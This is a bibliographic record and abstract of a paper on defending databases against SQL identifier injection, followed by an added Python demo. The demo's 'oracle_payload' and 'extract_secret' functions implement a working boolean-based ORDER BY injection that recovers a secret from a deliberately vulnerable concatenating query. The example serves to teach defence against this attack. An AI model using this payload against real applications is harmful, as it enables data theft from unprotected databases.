Method of protection of database management systems against sql-identifier injection attacks

Anna Dadonova, I. Yakoviv, V. Kozlovskiy
DOI: 10.18372/2310-5461.52.16385 (https://doi.org/10.18372/2310-5461.52.16385)
Journal: Science-based technologies, 39 (1)
Published: 2021-12-31 (journal article)
Citation count: 0

Abstract

The article reviews SQL injection and SQL identifier injection attacks (SQL-IDIA) against database management systems, identifying their nature, the threats they pose, and the types of these attacks. It also presents a new method of protecting database management systems from SQL identifier injection. The proposed solution is a pair of functions added to the prepared-statement API: setColumnName, which takes a column name and its placeholder index as arguments, and setTableName, which takes a table name and its placeholder index. This lets a prepared statement fill placeholders with table and column names, prevents SQL-IDIA, does not leak schema information, and is not subject to the limitations of input-based sanitization approaches. The two functions keep the database management system from leaking confidential database information by performing a default operation when the supplied column or table name does not exist in the database: for example, if an invalid column name is supplied as a sort column, the database management system sorts the results by the first column of the table. Only table and column names were covered in the extended API, since an analysis of GitHub code showed that 96% of concatenated identifiers were table and column names. In all experiments, the new setColumnName function outperformed the dynamic whitelisting implementation; in two experiments, a static whitelist implementation slightly outperformed setColumnName. Although the static whitelist holds a small performance advantage in those cases, whitelisting approaches add non-trivial complexity to program code and can produce incorrect results. The new setColumnName function successfully prevented all of the attacks tested. Filling placeholders with column names is practical and effective compared with existing ad hoc approaches, adds no overhead over the existing prepared-statement functions, and is effective against SQL identifier injection attacks.
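The following is an added example, not code from the paper or its prototype. The paper's setColumnName/setTableName functions attach to prepared-statement placeholders inside the database driver; Python's DB-API exposes no identifier placeholders, so the helpers below (bind_table_name, bind_column_name) instead resolve a caller-supplied identifier against the live SQLite schema before it is spliced into the statement, and fall back to the first table or column when the name is unknown. That fallback is an assumption modelled on the "default operation" the abstract describes. The schema, rows and the secret value are constructed for the demonstration. The example also shows why an ORDER BY identifier is a real sink even without stacked queries: a CASE expression in the sort key turns row order into a one-bit oracle on another table, which the concatenating version leaks and the resolved version does not.

```python
import sqlite3
import string

# Constructed sample schema and rows (not from the paper). The application
# lists 'users'; the attacker wants the contents of 'secrets'.
SCHEMA = """
CREATE TABLE users   (id INTEGER PRIMARY KEY, username TEXT NOT NULL);
CREATE TABLE secrets (id INTEGER PRIMARY KEY, note TEXT NOT NULL);
"""
USERS = [(1, "zed"), (2, "amy")]   # id order and name order differ on purpose
SECRETS = [(1, "hunter2")]         # the value the oracle attack recovers


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.executemany("INSERT INTO secrets VALUES (?, ?)", SECRETS)
    return conn


def list_users_vulnerable(conn, sort_column):
    """The ORDER BY target is an identifier, so the DB-API '?' placeholder
    cannot bind it. The common shortcut is concatenation: the SQL-IDIA sink."""
    sql = f"SELECT id, username FROM users ORDER BY {sort_column}"
    return conn.execute(sql).fetchall()


def quote_identifier(name):
    """SQL identifier quoting: double quotes, embedded quotes doubled."""
    return '"' + name.replace('"', '""') + '"'


def bind_table_name(conn, name):
    """Resolve a caller-supplied table name against the live schema. An unknown
    name falls back to the first table rather than raising, so the error channel
    does not confirm which tables exist. Assumption: this mirrors the 'default
    operation' the abstract describes; it is not the paper's implementation."""
    tables = [row[0] for row in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY rowid")]
    chosen = name if name in tables else tables[0]
    return quote_identifier(chosen)


def bind_column_name(conn, quoted_table, name):
    """Resolve a column name against the table's real column list. An unknown
    name defaults to the first column, the behaviour the abstract gives for an
    invalid sort column (same assumption as above)."""
    cols = [row[1] for row in conn.execute(f"PRAGMA table_info({quoted_table})")]
    chosen = name if name in cols else cols[0]
    return quote_identifier(chosen)


def list_users_safe(conn, sort_column):
    """Same query, but every identifier reaches the SQL text only after being
    resolved to a name the schema actually contains."""
    table = bind_table_name(conn, "users")
    column = bind_column_name(conn, table, sort_column)
    return conn.execute(f"SELECT id, username FROM {table} ORDER BY {column}").fetchall()


def oracle_payload(position, guess):
    """Boolean-based SQL-IDIA payload: no stacked query, no UNION, just an
    ORDER BY expression whose sort key depends on one character of the secret."""
    return (f"(CASE WHEN (SELECT substr(note, {position}, 1) FROM secrets WHERE id = 1) "
            f"= '{guess}' THEN username ELSE id END)")


def extract_secret(list_fn, conn, length):
    """Recover the secret character by character by watching which row comes
    first: 'amy' first means the CASE chose username, i.e. the guess was right.
    Returns '' when the order never changes (the sink is not injectable)."""
    recovered = ""
    for pos in range(1, length + 1):
        for guess in string.ascii_lowercase + string.digits:
            rows = list_fn(conn, oracle_payload(pos, guess))
            if rows[0][1] == "amy":
                recovered += guess
                break
        else:
            break  # no guess flipped the order: stop rather than invent characters
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable sink leaks:", extract_secret(list_users_vulnerable, db, 7))
    print("resolved identifiers leak:", repr(extract_secret(list_users_safe, db, 7)))
    print("invalid column falls back to first column:", list_users_safe(db, "no_such_col"))
```

Run against the constructed database, the concatenating version hands back the full secret one character per 36 requests at most, while the resolved version sorts by the first column for every payload and the oracle never fires. Note that the fallback hides the schema from an attacker but can also hide a typo from a developer, which is why the abstract's trade-off against whitelisting is about complexity and correctness as much as performance.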